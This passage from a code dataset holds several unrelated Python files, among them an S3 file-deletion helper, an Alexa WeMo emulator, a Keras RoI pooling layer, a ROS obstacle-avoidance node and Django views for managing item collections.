stderr=subprocess.STDOUT)\n files=[]\n for line in p.stdout.readlines():\n #print(line)\n if True:\n #print(re.findall(r\"Listing#\\d+\\.csv.gz\",str(line)))\n if not condo:\n file = re.findall(r\"\\b\\D+#\\d+\\.csv.gz\",str(line))\n else:\n file = re.findall(r\"\\b\\D+#\\d+_condo\\.csv.gz\",str(line))\n if (len(file)>0) and (file[0].strip() not in exclude):\n files.append(file[0].strip())\n else:\n if not condo:\n file = re.findall(r\"\\b\\D+#\\d+\\.csv\",str(line))\n else:\n file = re.findall(r\"\\b\\D+#\\d+_condo\\.csv\",str(line))\n if (len(file)>0) and (file[0].strip() not in exclude):\n files.append(file[0].strip())\n return files\n \n def delete(self,files):\n for i, file in enumerate(files): \n cmdln = \"aws s3 rm s3://\" + self.bucket + \"/\" + file + \" --region us-east-2 \"\n print(cmdln)\n p = subprocess.Popen(cmdln, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n for line in p.stdout.readlines():\n print(line)\n","sub_path":"common/Empty_File_S3.py","file_name":"Empty_File_S3.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"469355492","text":"#!/usr/bin/python2\n\n'''\n Max Kessler \n \n Main routine for the fauxmo WeMo emulator based on\n http://www.makermusings.com/2015/07/13/amazon-echo-and-home-automation/\n'''\n\nimport sys\nimport os\nimport time\nimport logging\nimport fauxmo\nimport handler\n\nfrom cmus_remote_py.cmus_remote_client_py2 import send_cmus_cmd\n\nlogging.basicConfig(filename='wemo.log',level=logging.DEBUG)\n#~ logging.basicConfig(stream=sys.stdout,level=logging.DEBUG)\nlogging.debug(\"\\nStart program\\n\")\n\n# List of scripts to run on the Raspberri pi.\n# Each entry is a list with the following elements:\n#\n# name of the virtual switch\n# object with 'on' and 'off' methods\n# port # (optional; may be omitted)\n\n# NOTE: As of 2015-08-17, the Echo appears to have a hard-coded limit of\n# 16 switches it can control. Only the first 16 elements of the FAUXMOS\n# list will be used.\n\ntry:\n\tSCRIPTS = [\n\t\t['test', handler.script_handler(\"test_script_on.sh\", \"test_script_off.sh\")],\n\t\t['cloud', handler.script_handler(\"remount.sh\")],\n\t\t['linie', handler.fct_handler(send_cmus_cmd, ['next', '192.168.0.11', 65001], send_cmus_cmd, ['prev', '192.168.0.11', 65001])],\n\t\t['desktop', handler.fct_handler(send_cmus_cmd, ['play', '192.168.0.11', 65001], send_cmus_cmd, ['pause', '192.168.0.11', 65001])]\n\t]\n\t\n\tlogging.debug(\"Scripts with handlers initialized.\")\nexcept Exception as e:\n\tlogging.debug(\"Initialization of scripts failed.\")\n\tlogging.critical(e)\n\t\n\n# Set up our singleton for polling the sockets for data ready\np = fauxmo.poller()\n\n# Set up our singleton listener for UPnP broadcasts\nu = fauxmo.upnp_broadcast_responder()\nu.init_socket()\n\n# Add the UPnP broadcast listener to the poller so we can respond\n# when a broadcast is received.\np.add(u)\n\n# Create our FauxMo virtual switch devices\nfor one_faux in SCRIPTS:\n\tif len(one_faux) == 2:\n\t\t# a fixed port wasn't specified, use a dynamic one\n\t\tone_faux.append(0)\n\tswitch = fauxmo.fauxmo(one_faux[0], u, p, None, one_faux[2], action_handler = one_faux[1])\n\nlogging.debug(\"Entering main loop\\n\")\n\nwhile True:\n\t#~ try:\n\t\t# Allow time for a ctrl-c to stop the process\n\tp.poll(100)\n\ttime.sleep(0.1)\n\t#~ except Exception as e:\n\t\t#~ logging.debug(\"Main loop exception:\")\n\t\t#~ logging.debug(\"type: {}, args: {}\".format(type(e), e.args))\n\t\t#~ logging.critical(e)\n\t\t\t\t\n\t\t#~ break\n\t\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"297443451","text":"\"\"\"\nRepresentação de um nó de um cluster no system center virtual machine manager.\nPara seguir a nomemclatura de nuvem, designado aqui como 'Region'\n\"\"\"\n\n\n# pylint: disable=too-few-public-methods\nclass SCRegion():\n REGIAO_PADRAO = 'default'\n\n def __init__(self, id_no, nome_no, grupo, cluster, letra_id=None):\n self.id_no = id_no\n self.nome_no = nome_no\n self.grupo = grupo\n self.cluster = cluster\n self.letra_id = letra_id\n\n def __str__(self):\n return f'''\n id_no: {self.id_no}\n nome_no: {self.nome_no}\n grupo: {self.grupo}\n cluster: {self.cluster}\n letra_id: {self.letra_id}\n '''\n","sub_path":"vmm_manager/scvmm/scregion.py","file_name":"scregion.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"532376653","text":"from keras.engine.topology import Layer\nimport keras.backend as K\n\nif K.backend() == 'tensorflow':\n import tensorflow as tf\n\n\nclass RoiPoolingConv(Layer):\n \"\"\"\n ROI pooling dla wejsc 2D\n Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition,\n K. He, X. Zhang, S. Ren, J. Sun\n\n # Parametry:\n pool_size: int\n Wielkosc obszaru, ustawienie np pool_size = 7 da obszar o wielkosci 7x7\n num_rois: int\n Ilosc obszarow zainteresowania, ktore powinny zostac uzyte\n # Wejscie:\n lista dwoch tensorow [X_img,X_roi] o strukturze:\n X_img: macierz 4D o strukturze (1, wiersze, kolumny, kanaly (kolory))\n X_roi: tensor 3D (1, num_rois, 4), lista rois z formatem (x,y,w,h)\n # Wyjscie:\n Tensor 3D o formacie (1, num_rois, pool_size, pool_size, kanaly)\n \"\"\"\n\n def __init__(self, pool_size, num_rois, **kwargs):\n\n self.dim_ordering = K.image_dim_ordering()\n assert self.dim_ordering in {'tf', 'th'}, 'dim_ordering must be in {tf, th}'\n\n self.pool_size = pool_size\n self.num_rois = num_rois\n\n super(RoiPoolingConv, self).__init__(**kwargs)\n\n def build(self, input_shape):\n if self.dim_ordering == 'th':\n self.nb_channels = input_shape[0][1]\n elif self.dim_ordering == 'tf':\n self.nb_channels = input_shape[0][3]\n\n def compute_output_shape(self, input_shape):\n if self.dim_ordering == 'th':\n return None, self.num_rois, self.nb_channels, self.pool_size, self.pool_size\n else:\n return None, self.num_rois, self.pool_size, self.pool_size, self.nb_channels\n\n def call(self, x, mask=None):\n\n assert(len(x) == 2)\n\n img = x[0]\n rois = x[1]\n\n input_shape = K.shape(img)\n\n outputs = []\n\n for roi_idx in range(self.num_rois):\n\n x = rois[0, roi_idx, 0]\n y = rois[0, roi_idx, 1]\n w = rois[0, roi_idx, 2]\n h = rois[0, roi_idx, 3]\n\n row_length = w / float(self.pool_size)\n col_length = h / float(self.pool_size)\n\n num_pool_regions = self.pool_size\n\n if self.dim_ordering == 'th':\n for jy in range(num_pool_regions):\n for ix in range(num_pool_regions):\n x1 = x + ix * row_length\n x2 = x1 + row_length\n y1 = y + jy * col_length\n y2 = y1 + col_length\n\n x1 = K.cast(x1, 'int32')\n x2 = K.cast(x2, 'int32')\n y1 = K.cast(y1, 'int32')\n y2 = K.cast(y2, 'int32')\n\n x2 = x1 + K.maximum(1,x2-x1)\n y2 = y1 + K.maximum(1,y2-y1)\n\n new_shape = [input_shape[0], input_shape[1],\n y2 - y1, x2 - x1]\n\n x_crop = img[:, :, y1:y2, x1:x2]\n xm = K.reshape(x_crop, new_shape)\n pooled_val = K.max(xm, axis=(2, 3))\n outputs.append(pooled_val)\n\n elif self.dim_ordering == 'tf':\n x = K.cast(x, 'int32')\n y = K.cast(y, 'int32')\n w = K.cast(w, 'int32')\n h = K.cast(h, 'int32')\n\n rs = tf.image.resize_images(img[:, y:y+h, x:x+w, :], (self.pool_size, self.pool_size))\n outputs.append(rs)\n\n final_output = K.concatenate(outputs, axis=0)\n final_output = K.reshape(final_output, (1, self.num_rois, self.pool_size, self.pool_size, self.nb_channels))\n\n if self.dim_ordering == 'th':\n final_output = K.permute_dimensions(final_output, (0, 1, 4, 2, 3))\n else:\n final_output = K.permute_dimensions(final_output, (0, 1, 2, 3, 4))\n\n return final_output\n","sub_path":"keras_frcnn/RoiPoolingConv.py","file_name":"RoiPoolingConv.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"357337254","text":"import datetime\nimport time\n\n@outputSchema(\"{(port:int, count:int)}\")\ndef portdist(ports):\n ports_notup = [p[0] for p in ports]\n d = {}\n for p in ports_notup:\n if p in d:\n d[p] += 1\n else:\n d[p] = 1\n return [(k, v) for k, v in d.iteritems()]\n\n@outputSchema(\"{(key:int, count:int)}\")\ndef portgrp(ports):\n ports_notup = [p[0] for p in ports]\n sys = []\n reg = []\n eph = []\n for p in ports_notup:\n if p > 49151:\n eph.append(p)\n elif p > 1023:\n reg.append(p)\n else:\n sys.append(p)\n sysd = {}\n for p in sys:\n if p in sysd:\n sysd[p] += 1\n else:\n sysd[p] = 1\n regd = {}\n for p in reg:\n k = (p - 1024) // 100\n if k in regd:\n regd[k] += 1\n else:\n regd[k] = 1\n ephd = {}\n for p in eph:\n k = (p - 49152) // 1000\n if k in ephd:\n ephd[k] += 1\n else:\n ephd[k] = 1\n sysl = [(k, v) for k, v in sysd.iteritems()]\n regl = [(k + 1024, v) for k, v in regd.iteritems()]\n ephl = [(k + 1505, v) for k, v in ephd.iteritems()]\n return sysl + regl + ephl\n\n@outputSchema(\"ts:int\")\ndef ts2epoch(ts):\n return int(time.mktime(datetime.datetime.strptime(''.join([chr(c) for c in ts]), \"%Y-%m-%d %H:%M:%S\").timetuple()))\n\n@outputSchema(\"{(bin_id:double, count:int)}\")\ndef countDistinct(elems):\n count = {}\n for e in elems:\n if e[0] in count:\n count[e[0]] += 1\n else:\n count[e[0]] = 1\n return [(k, v) for k, v in count.iteritems()]\n","sub_path":"misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"149173052","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom geometry_msgs.msg import Twist\n\nrangeAhead = 0\nmaxRange = 0\nminRange = 0\nright = 0\nleft = 0\n\ndef rangeCallback(msg):\n global rangeAhead, maxRange, minRange, left, right\n rangeAhead = msg.ranges[int(len(msg.ranges) / 2)]\n maxRange = max(msg.ranges)\n minRange = min(msg.ranges)\n right = msg.ranges[0]\n left = msg.ranges[len(msg.ranges) - 1]\n\ndef botHandler():\n pub = rospy.Publisher('hokuyobot/cmd_vel', Twist, queue_size = 10 )\n vel = Twist()\n while not (rospy.is_shutdown()):\n\n if(minRange != 0 and minRange < .45):\n if(left < right):\n vel.angular.z = 2/minRange\n else:\n vel.angular.z = -2/minRange\n else:\n vel.angular.z = 0\n vel.linear.x = rangeAhead * .75\n pub.publish(vel)\n\nif __name__ == '__main__':\n rospy.init_node('Navigate')\n rangeSub = rospy.Subscriber('hokuyobot/laser/scan', LaserScan, rangeCallback)\n botHandler()\n","sub_path":"learning_robot_control/scripts/avoidObstaclesV2.py","file_name":"avoidObstaclesV2.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"67323840","text":"import cv2\nimport IPython\n\nimg=cv2.imread('C:\\\\Users\\\\USER\\\\Desktop\\\\AirDraw\\\\SpongeImg\\\\Nature.jpg')\n\n#cv2.getTickCount() returns the number of clock cycles\n#cv2.getTickFrequency translates it to ms\n\n#example\ne1 = cv2.getTickCount()\nfor i in range(5,49,2):\n img = cv2.medianBlur(img,i)\ne2 = cv2.getTickCount()\nt = (e2 - e1)/cv2.getTickFrequency()\nprint (t)\n# Result I got is 0.521107655 seconds\n\n#Optimization: On/Off\n# check if optimization is enabled\nprint(cv2.useOptimized())\n\n# time it res = cv2.medianBlur(img,49)\n#10 loops, best of 3: 34.9 ms per loop\n\n# Disable it\ncv2.setUseOptimized(False)\n\nprint(cv2.useOptimized())\n\n#%timeit res = cv2.medianBlur(img,49)\n#10 loops, best of 3: 64.1 ms per loop\n\n\n#Measuring Performance in IPython with %timeit method,see documentation\n\n#Python and cv2 methods are usually faster than np methods when it comes to small operations.\n\n#1.Avoid using loops in Python as far as possible, especially double/triple loops etc. They are inherently slow.\n#2.Vectorize the algorithm/code to the maximum possible extent because Numpy and OpenCV are optimized for vector operations.\n#3.Exploit the cache coherence.\n#4.ever make copies of array unless it is needed. Try to use views instead. Array copying is a costly operation.\n\n\n\n","sub_path":"Core Operations/Performance/Perform.py","file_name":"Perform.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"271033313","text":"# Uses Google Speech Api and makes a request\n# Transcribes audio file and searches for the keyword(lyric)\n# Returns start and end time of the keyword(lyric)\nimport io\nimport re\nfrom google.cloud import speech\nfrom google.cloud.speech import enums\nfrom google.cloud.speech import types\n\ndef transcribe_file(speech_file, lyric, index):\n client = speech.SpeechClient()\n\n with io.open(speech_file, 'rb') as audio_file:\n content = audio_file.read()\n\n audio = types.RecognitionAudio(content=content)\n config = types.RecognitionConfig(\n encoding=enums.RecognitionConfig.AudioEncoding.FLAC,\n sample_rate_hertz=48000,\n language_code='en-US',\n enable_word_time_offsets=True)\n\n response = client.recognize(config, audio)\n\n for result in response.results:\n alternative = result.alternatives[0]\n print('Transcript: {}'.format(alternative.transcript))\n print('Confidence: {}'.format(alternative.confidence))\n\n for word_info in alternative.words:\n word_info.word = re.sub(r'[^\\w\\s]','',word_info.word)\n word = word_info.word\n if(word.lower() == lyric[index].lower()):\n start_time = word_info.start_time\n end_time = word_info.end_time\n print('Word: {}, start_time: {}, end_time: {}'.format(\n word,\n start_time.seconds + start_time.nanos * 1e-9,\n end_time.seconds + end_time.nanos * 1e-9))\n return word_info\n break\n return word_info","sub_path":"transcribe.py","file_name":"transcribe.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"612428374","text":"# -*- coding: UTF-8 -*-\n\n'''\nCreated on Apr 20, 2016\n\n@author: k.maciejczuk\n'''\n\nfrom django.core.urlresolvers import reverse\nfrom django.forms.models import modelformset_factory\nfrom django.forms.widgets import HiddenInput\nfrom django.shortcuts import render, redirect\nfrom django.utils.safestring import mark_safe\nfrom django.views.generic.base import View\n\nfrom main.constants import Buttons\nfrom main.forms import Collection_New_Form, Collection_New_Attributes_Form, New_List_Form, \\\n Item_Form, Additional_Values_Form, Item_Amount_Form\nfrom main.models import Collections, Attribute_Types, Support_Tables, Support_Values, Items, \\\n Additional_Attributes\nfrom main.helpers import Redirect_Link as RL\n\n\nclass Main(View):\n \"\"\"\n @PODSUMOWANIE: Widok wyboru kolekcji.\n @DANE: Ten widok nie wymaga dodatkowych danych\n \"\"\"\n view_template = \"main.html\"\n TITLE = u\"Wybierz zbior / kolekcje\"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, *args, **kwargs):\n # WUtwórz listę elementów listy prawego menu składającą się z istniejących kolekcji\n scroll_menu = [item.make_link() for item in Collections.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"collection_new\": Buttons.COLLECTION_NEW\n })\n\n def post(self, request, *args, **kwargs):\n pass\n\n def dispatch(self, *args, **kwargs):\n return super(Main, self).dispatch(*args, **kwargs)\n\n\nclass Collection_New(View):\n \"\"\"\n @PODSUMOWANIE: Widok tworzenia nowej kolekcji.\n @DANE: Ten widok nie wymaga dodatkowych danych\n \"\"\"\n view_template = \"collection_new.html\"\n TITLE = u\"Stwórz nową kolekcję\"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, *args, **kwargs):\n # Utwórz formularz nowej kolekcji\n name_form = Collection_New_Form()\n # Utwórz listę elementów listy prawego menu składającą się z istniejących kolekcji\n scroll_menu = [item.make_link() for item in Collections.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n })\n\n def post(self, request, *args, **kwargs):\n # Utwórz forumlarz i uzupełnij go o dane z formularza\n name_form = Collection_New_Form(request.POST)\n # Waliduj\n if name_form.is_valid():\n # Zapisz i przekieruj na widok kolekcji\n collection = name_form.save()\n return redirect(reverse(\"collection_edit\",\n kwargs={\"collection\": collection.id}))\n # Jeśli walidaja się nie powiodła, utwórz listę elementów listy prawego menu składającą się z istniejących kolekcji\n scroll_menu = [item.make_link() for item in Collections.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_New, self).dispatch(*args, **kwargs)\n\n\nclass Collection_Edit(View):\n \"\"\"\n @PODSUMOWANIE: Widok edycji nazwy , opisu i atrybutów kolekcji.\n @DANE: collection - numer id kolekcji\n \"\"\"\n view_template = \"collection_edit.html\"\n TITLE = u\"Edycja atrybutów przedmiotów: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n ATTRIBUTES_FORMSET = modelformset_factory(Additional_Attributes,\n Collection_New_Attributes_Form,\n can_delete=True,\n extra=0)\n\n def get(self, request, collection, *args, **kwargs):\n # Zamień numer id na obiekt\n collection = Collections.objects.get(pk=collection)\n # Utwórz formularz z instacją obiektu\n name_form = Collection_New_Form(instance=collection)\n # Uzupełnij dane początkowe do formsetu\n initial_data = []\n existing_attributes = Additional_Attributes.objects.filter(collection=collection)\n if existing_attributes.count() == 0: # Brak atrybutów, utwórz tylko jeden pusty formularz\n initial_data.append({\"collection\": collection})\n else: # Utwórz tyle danych początkowych ile jest atrybutów\n for each in existing_attributes:\n initial_data.append({\"collection\": collection,\n \"name\": each.name,\n \"attribute_type\": each.attribute_type,\n \"support_table\": each.support_table})\n # Wypełnij zestaw danymi początkowymi\n formset = self.ATTRIBUTES_FORMSET(initial=initial_data,\n queryset=Additional_Attributes.objects.filter(collection=collection))\n # Utwórz dane do dynamicznego tworzenia formularzy\n js_attribute_types = {item[\"id\"]: item[\"name\"] for item in Attribute_Types.objects.all().values(\"id\", \"name\")}\n js_support_lists = {item[\"id\"]: item[\"name\"] for item in Support_Tables.objects.all().values(\"id\", \"name\")}\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection.id),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection.id),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection.id)]\n #Utwórz listę elementów listy prawego menu składającą się z istniejących elementów kolekcji\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n \"formset\": formset,\n \"attribute_types\": js_attribute_types,\n \"support_lists\": js_support_lists,\n \"collection\": collection.id\n })\n\n def post(self, request, collection, *args, **kwargs):\n # Zamień numer id na obiekt\n collection = Collections.objects.get(pk=collection)\n # Utwórz formularz z instacją obiektu uzupełnionym o dane przychodzące z formularza\n name_form = Collection_New_Form(data=request.POST,\n instance=collection)\n\n message = ''\n # Waliduj, zapisz i dodaj stosowną informację zwrotną\n if name_form.is_valid():\n collection = name_form.save()\n message += \"Nazwa i opis kolekcji zostały zapisane poprawnie. \"\n else:\n message += \"Nazwa i opis kolekcji nie zostały zapisane. \"\n\n # Uzupełnij zestaw danymi przychodzącymi\n formset = self.ATTRIBUTES_FORMSET(data=request.POST,\n queryset=Additional_Attributes.objects.filter(collection=collection))\n # Waliduj, zapisz i dodaj stosowną informację zwrotną\n if formset.is_valid():\n formset.save()\n message += \"Atrybuty kolekcji zostały zapisane poprawnie.\"\n else:\n message += \"Atrybuty kolekcji nie zostały zapisane.\"\n\n # Jeśli wszystko jest prawidłowo wypełnione, odśwież całą kolekcję i odeślij do widoku tejże kolekcji\n if name_form.is_valid() and formset.is_valid():\n collection.update_whole_collection()\n return redirect(reverse(\"collection_view\",\n kwargs={\"collection\": collection.id}))\n # Utwórz dane do dynamicznego tworzenia formularzy\n js_attribute_types = mark_safe({att_type.id: att_type.name for att_type in Attribute_Types.objects.all()})\n js_support_lists = mark_safe({supp_list.id: supp_list.name for supp_list in Support_Tables.objects.all()})\n # dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection.id),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection.id),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection.id)]\n #Utwórz listę elementów listy prawego menu składającą się z istniejących elementów kolekcji\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n \"formset\": formset,\n \"attribute_types\": js_attribute_types,\n \"support_lists\": js_support_lists,\n \"message\": message,\n \"collection\": collection.id\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_Edit, self).dispatch(*args, **kwargs)\n\n\nclass Collection_Delete(View):\n \"\"\"\n @PODSUMOWANIE: Widok potwierdzenia usunięcia kolekcji i obsługa kasowania.\n @DANE: collection - numer id kolekcji\n \"\"\"\n view_template = \"collection_delete.html\"\n TITLE = u\"Skasuj kolekcję: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, collection, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n # Zamien numer id na obiekt\n collection = Collections.objects.get(pk=collection)\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"collection\": collection\n })\n\n def post(self, request, collection, *args, **kwargs):\n # W przypadku potwierdzenia, skasuj kolekcję (przynależne obiekty kasują się automatycznie)\n if request.POST.get(\"submit\", False) == \"Tak\":\n Collections.objects.get(pk=collection).delete()\n return redirect(reverse(\"home\"))\n # Jeśli nie, to odeślij do widoku kolekcji\n return redirect(reverse(\"collection_view\",\n kwargs={\"collection\": collection}\n ))\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_Delete, self).dispatch(*args, **kwargs)\n\n\nclass Collection_View(View):\n \"\"\"\n @PODSUMOWANIE: Widok główny pojedynczej kolekcji.\n @DANE: collection - numer id kolekcji\n item - numer id elementu. Niewymagany\n \"\"\"\n view_template = \"collection_view.html\"\n TITLE = u\"Przegląd elementów kolekcji: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n \n def get(self, request, collection, item=None, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n\n if item is not None: # Przegląd elementu - dodatkowe przyciski, dane elementu i formularz ilości\n edit_button = RL(url=\"item_edit\",\n title=\"Edytuj ten obiekt\",\n collection=collection,\n item=item)\n delete_button = RL(url=\"item_delete\",\n title=\"Skasuj ten obiekt\",\n collection=collection,\n item=item)\n item = Items.objects.get(pk=item)\n item.set_additional_attributes_as_dict()\n amount_form = Item_Amount_Form(instance=item)\n else: # Brak wybranego elementu\n amount_form = ''\n edit_button = ''\n delete_button = ''\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n collection = Collections.objects.get(pk=collection)\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item\": item,\n \"amount_form\": amount_form,\n \"message\": collection.description,\n \"edit_button\": edit_button,\n \"delete_button\": delete_button,\n })\n\n def post(self, request, collection, item=None, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n\n if item is not None: # Przegląd elementu - dodatkowe przyciski, dane elementu i formularz ilości\n edit_button = RL(url=\"item_edit\",\n title=\"Edytuj ten obiekt\",\n collection=collection,\n item=item)\n delete_button = RL(url=\"item_delete\",\n title=\"Skasuj ten obiekt\",\n collection=collection,\n item=item)\n item = Items.objects.get(pk=item)\n item.set_additional_attributes_as_dict()\n amount_form = Item_Amount_Form(data=request.POST,\n instance=item)\n if amount_form.is_valid():\n amount_form.save()\n else: # Brak wybranego elementu\n amount_form = ''\n edit_button = ''\n delete_button = ''\n # Utwórz listę elementów kolekcji do prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n collection = Collections.objects.get(pk=collection)\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item\": item,\n \"amount_form\": amount_form,\n \"message\": collection.description,\n \"edit_button\": edit_button,\n \"delete_button\": delete_button,\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_View, self).dispatch(*args, **kwargs)\n\n\nclass Item_Edit(View):\n \"\"\"\n @PODSUMOWANIE: Widok edycji pojedynczego elementu.\n @DANE: collection - numer id kolekcji\n item - numer id elementu, niewymagany\n \"\"\"\n view_template = \"item_edit.html\"\n TITLE = u\"Edycja elementu kolekcji: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n # TODO: Prevent loading view if there are no additional_attributes\n def get(self, request, collection, item=None, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n # Zamień numer id na obiekt \n collection = Collections.objects.get(pk=collection)\n \n if item is not None: # Edycja elementu, inicjalizuj formularz przedmiotu i jego atrybutów\n item_instance = Items.objects.get(pk=item)\n item_form = Item_Form(instance=item_instance)\n values_form = Additional_Values_Form(item=item_instance)\n message = ''\n else: # Nowy element, inicjalizuj tylko formularz nowego przedmiotu\n item_form = Item_Form(initial={\"collection\": collection})\n values_form = ''\n message = \"Wybierz element kolekcji z listy po prawej, albo dodaj nowy.\"\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item_form\": item_form,\n \"values_form\": values_form,\n \"message\": message\n })\n\n def post(self, request, collection, item=None, *args, **kwargs):\n if item is None:\n item_form = Item_Form(data=request.POST)\n else:\n item_form = Item_Form(data=request.POST,\n instance=Items.objects.get(pk=item))\n\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n\n values_form = ''\n if item_form.is_valid():\n saved_item = item_form.save()\n if item is not None:\n values_form = Additional_Values_Form(item=saved_item,\n data=request.POST)\n if values_form.is_valid():\n values_form.save()\n return redirect(reverse(\"item_view\", kwargs={\"collection\": collection, \"item\": saved_item.id}))\n return redirect(reverse(\"item_edit\", kwargs={\"collection\": collection, \"item\": saved_item.id}))\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + Collections.objects.get(pk=collection).name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item_form\": item_form,\n \"values_form\": values_form,\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Item_Edit, self).dispatch(*args, **kwargs)\n\n\nclass Item_Delete(View):\n \"\"\"\n @PODSUMOWANIE: Widok potwierdzenia usunięcia pojedynczego elementu oraz obsługa kasacji.\n @DANE: collection - numer id kolekcji\n item - numer id elementu, niewymagany\n \"\"\"\n view_template = \"item_delete.html\"\n TITLE = u\"Skasuj element kolekcji: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, collection, item, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n 